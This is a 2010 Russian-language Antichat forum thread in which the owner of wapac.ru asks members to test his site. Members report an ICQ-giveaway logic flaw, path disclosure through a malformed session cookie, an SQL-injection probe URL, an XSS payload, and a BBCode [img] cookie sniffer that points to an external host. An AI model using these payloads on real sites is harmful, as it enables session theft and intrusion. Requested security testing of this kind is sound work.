ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проверка на уязвимости !
  #1  
Старый 17.04.2010, 16:13
Аватар для materfaker
materfaker
Новичок
Регистрация: 17.04.2010
Сообщений: 3
Провел на форуме:
10155

Репутация: 0
Thumbs up Проверка на уязвимости !

Прошу проверить античат на уязвимость сайт http://wapac.ru буду очень благодарен!Щас установилю гифку античата
 
Ответить с цитированием

  #2  
Старый 18.04.2010, 17:58
Аватар для materfaker
materfaker
Новичок
Регистрация: 17.04.2010
Сообщений: 3
Провел на форуме:
10155

Репутация: 0
По умолчанию

Регистрации на сайте нету...
 
Ответить с цитированием

  #3  
Старый 18.04.2010, 19:36
Аватар для napas_hd
napas_hd
Познающий
Регистрация: 29.12.2008
Сообщений: 39
Провел на форуме:
1119456

Репутация: 8
По умолчанию

Назови нормально тему.

Нашел пару багов в раздаче ICQ:
На один и тот же емейл можно выслать сколько угодно номеров, надо всего лишь поставить пробел после эмейла (соответственно чтобы выслать 3й уин, необходимо поставить три пробела.

Можно получить чужие аськи, уже высланные. Вот пример http://wapac.ru/geticq/get1250
 
Ответить с цитированием

  #4  
Старый 18.04.2010, 19:42
Аватар для materfaker
materfaker
Новичок
Регистрация: 17.04.2010
Сообщений: 3
Провел на форуме:
10155

Репутация: 0
По умолчанию

второй баг исправил .... ща со 2 разберусь
 
Ответить с цитированием

  #5  
Старый 18.04.2010, 19:48
Аватар для z-kzn-z
z-kzn-z
Новичок
Регистрация: 17.04.2010
Сообщений: 15
Провел на форуме:
48171

Репутация: 3
Отправить сообщение для z-kzn-z с помощью ICQ
По умолчанию

napas_hd, насчет подставить пробелы - не понял.. куда именно подставить, в поле email?
подставил, не дает. там пробелы trim()-ом режутся
P.S. я соадмин
 
Ответить с цитированием

  #6  
Старый 18.04.2010, 20:14
Аватар для W@r.N0i$e
W@r.N0i$e
Участник форума
Регистрация: 02.06.2009
Сообщений: 143
Провел на форуме:
343507

Репутация: 114
По умолчанию

Раскрытие путей:
Добавляем к сессии с помощью любого редактора кукисов "лишние" символы и получаем:
Код:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/[path]/init.php on line 19

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /var/[path]/init.php:19) in /var/[path]/init.php on line 19

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /var/[path]/init.php:19) in /var/[path]/init.php on line 19

Warning: Cannot modify header information - headers already sent by (output started at /var/[path]/init.php:19) in /var/[path]/init.php on line 50
P.S. Товарищи. Ей богу. Надоело уже тыкать носом в банальные уязвимости, которые повторяет каждый первый пользователь ачата, который просит проверить сайт на баги. Считаю, что будет лучше почитать предыдущие посты в разделе и ознакомится с недочетами других пользователей, чтобы не допускать их ошибок. И желательно это сделать перед тем, как просить проверить свой сайт.
 
Ответить с цитированием

  #7  
Старый 18.04.2010, 20:25
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Можно прикрутить снифер в новостях в коментах
PHP код:
[_img]http://site.ru/snif.php[/_img] 
]
XSS там же
PHP код:
[_img]javascript:alert()[/_img

Последний раз редактировалось SeNaP; 18.04.2010 в 20:34..
 
Ответить с цитированием

  #8  
Старый 18.04.2010, 20:28
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://wapac.ru/videos.php?mode=video&'id_video=165
 
Ответить с цитированием

  #9  
Старый 18.04.2010, 23:47
Аватар для z-kzn-z
z-kzn-z
Новичок
Регистрация: 17.04.2010
Сообщений: 15
Провел на форуме:
48171

Репутация: 3
Отправить сообщение для z-kzn-z с помощью ICQ
По умолчанию

Спасибо! пофиксил.
извиняюсь за временное отключение апача на несколько часов, были проблемы, пришлось отключить.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Регеры ICQ UIN'ов by saiNT sai_NT ICQ 477 13.06.2010 17:48
Проверка на уязвимости Cайтов, Серверов, PHP кода. (Dm) О Работе 0 05.09.2009 14:28
Проверка серверов, и вебсайтов на уязвимости NeitR1N0 Разное - Покупка, продажа, обмен 12 18.03.2006 16:50



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ